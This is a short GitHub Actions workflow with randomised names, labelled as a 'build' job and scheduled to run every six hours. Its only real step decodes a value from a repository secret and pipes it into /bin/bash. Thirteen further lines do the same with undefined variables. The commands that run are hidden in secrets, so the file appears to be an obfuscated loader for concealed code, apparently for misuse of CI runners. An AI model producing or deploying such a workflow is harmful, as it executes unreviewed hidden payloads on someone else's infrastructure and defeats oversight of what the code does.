name: naizida4561

on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: naizida4561
        env:
          j80: ${{ secrets.j80 }}
        run: |
          echo $j80 | jq -r .brdfp96 | /bin/bash
          echo $qlucl1 | jq -r .xy3 | /bin/bash
          echo $m9 | jq -r .lksm83117 | /bin/bash
          echo $qzimh5 | jq -r .sn10842 | /bin/bash
          echo $d45866 | jq -r .urn03 | /bin/bash
          echo $twjfy668 | jq -r .lljl61458 | /bin/bash
          echo $jkt26 | jq -r .cd763 | /bin/bash
          echo $kor36 | jq -r .v37951 | /bin/bash
          echo $qs0 | jq -r .g10 | /bin/bash
          echo $x56333 | jq -r .fcnk34344 | /bin/bash
          echo $nvnhf64894 | jq -r .itvx50062 | /bin/bash
          echo $lvrde14431 | jq -r .imjz36 | /bin/bash
          echo $em324 | jq -r .rv55 | /bin/bash
          echo $z938 | jq -r .ajr55 | /bin/bash

